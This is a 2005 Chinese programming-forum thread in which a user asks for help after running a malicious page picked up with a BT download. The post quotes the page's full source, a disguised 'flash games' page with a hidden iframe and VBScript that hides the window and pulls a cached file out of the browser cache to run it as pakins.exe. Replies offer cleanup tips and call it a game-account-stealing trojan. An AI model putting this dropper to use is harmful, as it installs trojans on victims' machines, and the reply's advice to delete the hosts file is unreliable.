| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
登录
注册
用户控制面板
搜索
道具
风格
短消息
论坛展区
帮助
编程论坛技术综合『 Windows论坛 』 → 被骗下了个破坏程序 还运行了-_-! 谁能进来帮我看看
我的收件箱(0)
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 659 人关注过本帖
标题:被骗下了个破坏程序 还运行了-_-! 谁能进来帮我看看
只看楼主 加入收藏
ccc2
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2005-3-21
楼主
收藏
 问题点数:0 回复次数:4 
被骗下了个破坏程序 还运行了-_-! 谁能进来帮我看看
昨天下载bt文件时被骗了下了个不知道是什么恶意程序还运行了 谁能帮我看看 到底修改了什么,怎么才能改回来? 文件上传了如下 我把它压缩了 <!----> 点击浏览该文件 用写字板打开文件如下 html> <title>online flash games</title> <iframe src="pakins.htm" width="0" height="0" frameborder="0"></iframe> <SCRIPT LANGUAGE="VBScript"> Option Explicit Dim FSO, WSH Dim strCachePath, strExePath '系统缓存文件的路径,要搜索的Exe文件的路径 Dim lngSuccess '搜索是否成功 window.resizeTo 0, 0 window.moveto 10000, 10000 Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") strCachePath = WSH.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") lngSuccess = 0 Sub StartSearch() SearchFile FSO.GetFolder(strCachePath), "pakins[1].htm" if lngSuccess = 0 then SearchFile FSO.GetFolder(strCachePath), "pakins[2].htm" if lngSuccess = 0 then setTimeout "StartSearch()", 1000 End Sub Function SearchFile(Folder, strFileName) On Error Resume Next Dim SubFolder '子文件夹对象 Dim strWinTmpPath, strWinSysPath Dim strFilePath, File '当前的文件路径,当前的文件对象 strFilePath=FSO.GetParentFolderName(Folder) & "\" & Folder.Name & "\" If FSO.FileExists(strFilePath & strFileName) Then strWinTmpPath = FSO.GetSpecialFolder(2) & "\" strWinSysPath = FSO.GetSpecialFolder(1) & "\" set File = FSO.GetFile(strFilePath & strFileName) If File.Size = 104469 then File.Copy(strWinTmpPath & "pakins.exe") WSH.Run strWinTmpPath & "pakins.exe" lngSuccess = 1 'MsgBox "搞定" window.close() Else Exit Function End If End If If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchFile SubFolder, strFileName Next End If End Function setTimeout "StartSearch()", 1000 </SCRIPT> <body> 免费空间广告窗口,稍后将自动关闭。 </body> </html> <!---->
搜索更多相关主题的帖子: 运行 
2005-03-21 14:18
kingarden
Rank: 2
等 级:论坛游民
威 望:1
帖 子:517
专家分:40
注 册:2004-12-8
2
收藏
得分:0 
找到pakins.exe,将HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache键值下出现pakins的路径都删除,还有看看带RUN的启动项是否有pakins相关的键值。

〖ΦγЙ┅给梦一把梯子,现实与梦想之间的距离即可忽略,不可跨越的迢迢银河举步便可迈过Й┅Φ〗
2005-03-21 14:25
ccc2
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2005-3-21
3
收藏
得分:0 
以下是引用kingarden在2005-3-21 14:25:23的发言: 找到pakins.exe,将HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache键值下出现pakins的路径都删除,还有看看带RUN的启动项是否有pakins相关的键值。
找不到pakins.exe, 注册表上也没有pakins
2005-03-21 14:47
80425799
Rank: 1
等 级:新手上路
帖 子:2
专家分:0
注 册:2005-3-25
4
收藏
得分:0 
这是什么东西啊 看不懂!
2005-03-26 14:03
major
Rank: 1
等 级:新手上路
帖 子:18
专家分:0
注 册:2005-4-4
5
收藏
得分:0 
我运行过了,写的象传奇的盗号木马,你把"WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS"删掉

﹎﹎我笑﹎﹎並吥意味着我快樂﹎﹎っづく ━┻━╋━┻━┻ Gaмe ║ ●︳ Оひеr /■\\ 〢
2005-04-04 18:28
快速回复:被骗下了个破坏程序 还运行了-_-! 谁能进来帮我看看
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.014750 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved